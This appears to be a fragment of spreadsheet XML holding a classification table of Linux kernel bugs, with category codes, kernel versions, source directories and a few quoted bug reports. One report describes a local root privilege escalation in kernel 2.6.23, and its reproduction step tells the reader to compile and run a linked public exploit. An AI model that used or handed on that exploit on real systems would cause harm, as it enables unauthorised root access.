    <t>References : http://lkml.org/lkml/2007/8/4/6 http://lkml.org/lkml/2007/9/13/227 Submitter : Jeff Chua &lt;jeff.chua.linux@gmail.com&gt; Handled-By : H. Peter Anvin &lt;hpa@zytor.com&gt; Antonino A. Daplas &lt;adaplas@gmail.com&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.23 Distribution: Gentoo Hardware Environment: Software Environment: Problem Description: Local root privilege escalation Steps to reproduce: Compile this exploit and run it http://www.milw0rm.com/exploits/5093</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Mandriva 2008.0 Hardware Environment: Dell Latitude CPi D266XT Problem Description: CD-ROM CDR_U200 does not function in DMA mode. Can it be added to the dma blacklist? http://www.google.com/search?q=cdr_u200+dma</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>References: http://comments.gmane.org/gmane.linux.kernel/717552</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.18</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.21</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.22</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.24</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.25</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.28</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.28</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.29</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.31</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.33</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.31</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.34</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.35</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.36</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.37</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.35</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.35</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.38</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.38</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.38</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.38</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>STO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>STO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>STO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>STO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>REPAIRE LOCATION</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>init</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lib</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>init</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>init</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>fs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lib</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>security</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>arch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>include</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
